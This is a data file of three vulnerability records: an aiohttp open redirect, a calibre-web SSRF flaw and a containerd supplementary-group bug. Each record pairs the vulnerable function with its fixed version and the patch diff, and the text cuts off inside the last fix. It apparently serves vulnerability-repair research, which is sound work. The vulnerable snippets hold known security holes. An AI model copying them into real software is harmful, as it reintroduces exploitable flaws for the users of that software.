{"cve_id": "CVE-2021-21330", "cve_description": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In aiohttp before version 3.7.4 there is an open redirect vulnerability. A maliciously crafted link to an aiohttp-based web-server could redirect the browser to a different website. It is caused by a bug in the `aiohttp.web_middlewares.normalize_path_middleware` middleware. This security problem has been fixed in 3.7.4. Upgrade your dependency using pip as follows \"pip install aiohttp >= 3.7.4\". If upgrading is not an option for you, a workaround can be to avoid using `aiohttp.web_middlewares.normalize_path_middleware` in your applications.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/aio-libs/aiohttp", "patch_url": ["https://github.com/aio-libs/aiohttp/commit/2545222a3853e31ace15d87ae0e2effb7da0c96b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_357_1", "commit": "f2afa2f054ba9e6c5d142e00233f0073925e7893", "file_path": "aiohttp/web_middlewares.py", "start_line": 88, "end_line": 117, "snippet": " async def impl(request: Request, handler: _Handler) -> StreamResponse:\n if isinstance(request.match_info.route, SystemRoute):\n paths_to_check = []\n if \"?\" in request.raw_path:\n path, query = request.raw_path.split(\"?\", 1)\n query = \"?\" + query\n else:\n query = \"\"\n path = request.raw_path\n\n if merge_slashes:\n paths_to_check.append(re.sub(\"//+\", \"/\", path))\n if append_slash and not request.path.endswith(\"/\"):\n paths_to_check.append(path + \"/\")\n if remove_slash and request.path.endswith(\"/\"):\n paths_to_check.append(path[:-1])\n if merge_slashes and append_slash:\n paths_to_check.append(re.sub(\"//+\", \"/\", path + \"/\"))\n if merge_slashes and remove_slash and path.endswith(\"/\"):\n merged_slashes = re.sub(\"//+\", \"/\", path)\n paths_to_check.append(merged_slashes[:-1])\n\n for path in paths_to_check:\n resolves, request = await _check_request_resolves(request, path)\n if resolves:\n raise redirect_class(request.raw_path + query)\n\n return await handler(request)\n\n return impl"}], "fix_func": [{"id": "fix_py_357_1", "commit": "2545222a3853e31ace15d87ae0e2effb7da0c96b", "file_path": "aiohttp/web_middlewares.py", "start_line": 88, "end_line": 118, "snippet": " async def impl(request: Request, handler: _Handler) -> StreamResponse:\n if isinstance(request.match_info.route, SystemRoute):\n paths_to_check = []\n if \"?\" in request.raw_path:\n path, query = request.raw_path.split(\"?\", 1)\n query = \"?\" + query\n else:\n query = \"\"\n path = request.raw_path\n\n if merge_slashes:\n paths_to_check.append(re.sub(\"//+\", \"/\", path))\n if append_slash and not request.path.endswith(\"/\"):\n paths_to_check.append(path + \"/\")\n if remove_slash and request.path.endswith(\"/\"):\n paths_to_check.append(path[:-1])\n if merge_slashes and append_slash:\n paths_to_check.append(re.sub(\"//+\", \"/\", path + \"/\"))\n if merge_slashes and remove_slash and path.endswith(\"/\"):\n merged_slashes = re.sub(\"//+\", \"/\", path)\n paths_to_check.append(merged_slashes[:-1])\n\n for path in paths_to_check:\n path = re.sub(\"^//+\", \"/\", path) # SECURITY: GHSA-v6wp-4m6f-gcjg\n resolves, request = await _check_request_resolves(request, path)\n if resolves:\n raise redirect_class(request.raw_path + query)\n\n return await handler(request)\n\n return impl"}], "vul_patch": "--- a/aiohttp/web_middlewares.py\n+++ b/aiohttp/web_middlewares.py\n@@ -21,6 +21,7 @@\n paths_to_check.append(merged_slashes[:-1])\n \n for path in paths_to_check:\n+ path = re.sub(\"^//+\", \"/\", path) # SECURITY: GHSA-v6wp-4m6f-gcjg\n resolves, request = await _check_request_resolves(request, path)\n if resolves:\n raise redirect_class(request.raw_path + query)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0767", "cve_description": "Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/janeczku/calibre-web", "patch_url": ["https://github.com/janeczku/calibre-web/commit/965352c8d96c9eae7a6867ff76b0db137d04b0b8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_375_1", "commit": "8007e450b3178f517b83b0989744c6df38867932", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "fix_func": [{"id": "fix_py_375_1", "commit": "965352c8d96c9eae7a6867ff76b0db137d04b0b8", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "vul_patch": "--- a/cps/helper.py\n+++ b/cps/helper.py\n@@ -3,10 +3,10 @@\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n- if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\":\n+ if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n- img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n+ img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-25173", "cve_description": "containerd is an open source container runtime. A bug was found in containerd prior to versions 1.6.18 and 1.5.18 where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases, potentially gaining access to sensitive information or gaining the ability to execute code in that container. Downstream applications that use the containerd client library may be affected as well.\n\nThis bug has been fixed in containerd v1.6.18 and v.1.5.18. Users should update to these versions and recreate containers to resolve this issue. Users who rely on a downstream application that uses containerd's client library should check that application for a separate advisory and instructions. As a workaround, ensure that the `\"USER $USERNAME\"` Dockerfile instruction is not used. Instead, set the container entrypoint to a value similar to `ENTRYPOINT [\"su\", \"-\", \"user\"]` to allow `su` to properly set up supplementary groups.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/containerd/containerd", "patch_url": ["https://github.com/containerd/containerd/commit/133f6bb6cd827ce35a5fb279c1ead12b9d21460a"], "programing_language": "Go", "vul_func": [{"id": "vul_go_52_2", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 523, "end_line": 613, "snippet": "func WithUser(userstr string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) error {\n\t\tsetProcess(s)\n\n\t\t// For LCOW it's a bit harder to confirm that the user actually exists on the host as a rootfs isn't\n\t\t// mounted on the host and shared into the guest, but rather the rootfs is constructed entirely in the\n\t\t// guest itself. To accommodate this, a spot to place the user string provided by a client as-is is needed.\n\t\t// The `Username` field on the runtime spec is marked by Platform as only for Windows, and in this case it\n\t\t// *is* being set on a Windows host at least, but will be used as a temporary holding spot until the guest\n\t\t// can use the string to perform these same operations to grab the uid:gid inside.\n\t\tif s.Windows != nil && s.Linux != nil {\n\t\t\ts.Process.User.Username = userstr\n\t\t\treturn nil\n\t\t}\n\n\t\tparts := strings.Split(userstr, \":\")\n\t\tswitch len(parts) {\n\t\tcase 1:\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\t// if we cannot parse as a uint they try to see if it is a username\n\t\t\t\treturn WithUsername(userstr)(ctx, client, c, s)\n\t\t\t}\n\t\t\treturn WithUserID(uint32(v))(ctx, client, c, s)\n\t\tcase 2:\n\t\t\tvar (\n\t\t\t\tusername string\n\t\t\t\tgroupname string\n\t\t\t)\n\t\t\tvar uid, gid uint32\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\tusername = parts[0]\n\t\t\t} else {\n\t\t\t\tuid = uint32(v)\n\t\t\t}\n\t\t\tif v, err = strconv.Atoi(parts[1]); err != nil {\n\t\t\t\tgroupname = parts[1]\n\t\t\t} else {\n\t\t\t\tgid = uint32(v)\n\t\t\t}\n\t\t\tif username == \"\" && groupname == \"\" {\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tf := func(root string) error {\n\t\t\t\tif username != \"\" {\n\t\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\t\treturn u.Name == username\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tuid = uint32(user.Uid)\n\t\t\t\t}\n\t\t\t\tif groupname != \"\" {\n\t\t\t\t\tgid, err = GIDFromPath(root, func(g user.Group) bool {\n\t\t\t\t\t\treturn g.Name == groupname\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\treturn f(s.Root.Path)\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, f)\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"invalid USER value %s\", userstr)\n\t\t}\n\t}\n}"}, {"id": "vul_go_52_3", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 616, "end_line": 623, "snippet": "func WithUIDGID(uid, gid uint32) SpecOpts {\n\treturn func(_ context.Context, _ Client, _ *containers.Container, s *Spec) error {\n\t\tsetProcess(s)\n\t\ts.Process.User.UID = uid\n\t\ts.Process.User.GID = gid\n\t\treturn nil\n\t}\n}"}, {"id": "vul_go_52_4", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 629, "end_line": 678, "snippet": "func WithUserID(uid uint32) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\tsetProcess(s)\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n\t\t\t\treturn u.Uid == int(uid)\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\treturn nil\n\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\treturn u.Uid == int(uid)\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\treturn nil\n\t\t})\n\t}\n}"}, {"id": "vul_go_52_5", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 686, "end_line": 733, "snippet": "func WithUsername(username string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\tsetProcess(s)\n\t\tif s.Linux != nil {\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n\t\t\t\t\treturn u.Name == username\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Name == username\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\t\treturn nil\n\t\t\t})\n\t\t} else if s.Windows != nil {\n\t\t\ts.Process.User.Username = username\n\t\t} else {\n\t\t\treturn errors.New(\"spec does not contain Linux or Windows section\")\n\t\t}\n\t\treturn nil\n\t}\n}"}, {"id": "vul_go_52_6", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 738, "end_line": 804, "snippet": "func WithAdditionalGIDs(userstr string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\t// For LCOW or on Darwin additional GID's not supported\n\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n\t\t\treturn nil\n\t\t}\n\t\tsetProcess(s)\n\t\tsetAdditionalGids := func(root string) error {\n\t\t\tvar username string\n\t\t\tuid, err := strconv.Atoi(userstr)\n\t\t\tif err == nil {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Uid == uid\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t}\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tusername = user.Name\n\t\t\t} else {\n\t\t\t\tusername = userstr\n\t\t\t}\n\t\t\tgids, err := getSupplementalGroupsFromPath(root, func(g user.Group) bool {\n\t\t\t\t// we only want supplemental groups\n\t\t\t\tif g.Name == username {\n\t\t\t\t\treturn false\n\t\t\t\t}\n\t\t\t\tfor _, entry := range g.List {\n\t\t\t\t\tif entry == username {\n\t\t\t\t\t\treturn true\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) {\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.AdditionalGids = gids\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setAdditionalGids(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n\t}\n}"}], "fix_func": [{"id": "fix_go_52_1", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 116, "end_line": 126, "snippet": "// ensureAdditionalGids ensures that the primary GID is also included in the additional GID list.\nfunc ensureAdditionalGids(s *Spec) {\n\tsetProcess(s)\n\tfor _, f := range s.Process.User.AdditionalGids {\n\t\tif f == s.Process.User.GID {\n\t\t\treturn\n\t\t}\n\t}\n\ts.Process.User.AdditionalGids = append([]uint32{s.Process.User.GID}, s.Process.User.AdditionalGids...)\n}\n"}, {"id": "fix_go_52_2", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 534, "end_line": 626, "snippet": "func WithUser(userstr string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) error {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\n\t\t// For LCOW it's a bit harder to confirm that the user actually exists on the host as a rootfs isn't\n\t\t// mounted on the host and shared into the guest, but rather the rootfs is constructed entirely in the\n\t\t// guest itself. To accommodate this, a spot to place the user string provided by a client as-is is needed.\n\t\t// The `Username` field on the runtime spec is marked by Platform as only for Windows, and in this case it\n\t\t// *is* being set on a Windows host at least, but will be used as a temporary holding spot until the guest\n\t\t// can use the string to perform these same operations to grab the uid:gid inside.\n\t\tif s.Windows != nil && s.Linux != nil {\n\t\t\ts.Process.User.Username = userstr\n\t\t\treturn nil\n\t\t}\n\n\t\tparts := strings.Split(userstr, \":\")\n\t\tswitch len(parts) {\n\t\tcase 1:\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\t// if we cannot parse as a uint they try to see if it is a username\n\t\t\t\treturn WithUsername(userstr)(ctx, client, c, s)\n\t\t\t}\n\t\t\treturn WithUserID(uint32(v))(ctx, client, c, s)\n\t\tcase 2:\n\t\t\tvar (\n\t\t\t\tusername string\n\t\t\t\tgroupname string\n\t\t\t)\n\t\t\tvar uid, gid uint32\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\tusername = parts[0]\n\t\t\t} else {\n\t\t\t\tuid = uint32(v)\n\t\t\t}\n\t\t\tif v, err = strconv.Atoi(parts[1]); err != nil {\n\t\t\t\tgroupname = parts[1]\n\t\t\t} else {\n\t\t\t\tgid = uint32(v)\n\t\t\t}\n\t\t\tif username == \"\" && groupname == \"\" {\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tf := func(root string) error {\n\t\t\t\tif username != \"\" {\n\t\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\t\treturn u.Name == username\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tuid = uint32(user.Uid)\n\t\t\t\t}\n\t\t\t\tif groupname != \"\" {\n\t\t\t\t\tgid, err = GIDFromPath(root, func(g user.Group) bool {\n\t\t\t\t\t\treturn g.Name == groupname\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\treturn f(s.Root.Path)\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, f)\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"invalid USER value %s\", userstr)\n\t\t}\n\t}\n}"}, {"id": "fix_go_52_3", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 629, "end_line": 638, "snippet": "func WithUIDGID(uid, gid uint32) SpecOpts {\n\treturn func(_ context.Context, _ Client, _ *containers.Container, s *Spec) error {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\ts.Process.User.UID = uid\n\t\ts.Process.User.GID = gid\n\t\treturn nil\n\t}\n}"}, {"id": "fix_go_52_4", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 644, "end_line": 684, "snippet": "func WithUserID(uid uint32) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\tsetUser := func(root string) error {\n\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\treturn u.Uid == int(uid)\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setUser(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n\t}\n}"}, {"id": "fix_go_52_5", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 692, "end_line": 735, "snippet": "func WithUsername(username string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\tif s.Linux != nil {\n\t\t\tsetUser := func(root string) error {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Name == username\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\treturn setUser(s.Root.Path)\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n\t\t} else if s.Windows != nil {\n\t\t\ts.Process.User.Username = username\n\t\t} else {\n\t\t\treturn errors.New(\"spec does not contain Linux or Windows section\")\n\t\t}\n\t\treturn nil\n\t}\n}"}, {"id": "fix_go_52_6", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 740, "end_line": 808, "snippet": "func WithAdditionalGIDs(userstr string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\t// For LCOW or on Darwin additional GID's not supported\n\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n\t\t\treturn nil\n\t\t}\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\tsetAdditionalGids := func(root string) error {\n\t\t\tdefer ensureAdditionalGids(s)\n\t\t\tvar username string\n\t\t\tuid, err := strconv.Atoi(userstr)\n\t\t\tif err == nil {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Uid == uid\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t}\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tusername = user.Name\n\t\t\t} else {\n\t\t\t\tusername = userstr\n\t\t\t}\n\t\t\tgids, err := getSupplementalGroupsFromPath(root, func(g user.Group) bool {\n\t\t\t\t// we only want supplemental groups\n\t\t\t\tif g.Name == username {\n\t\t\t\t\treturn false\n\t\t\t\t}\n\t\t\t\tfor _, entry := range g.List {\n\t\t\t\t\tif entry == username 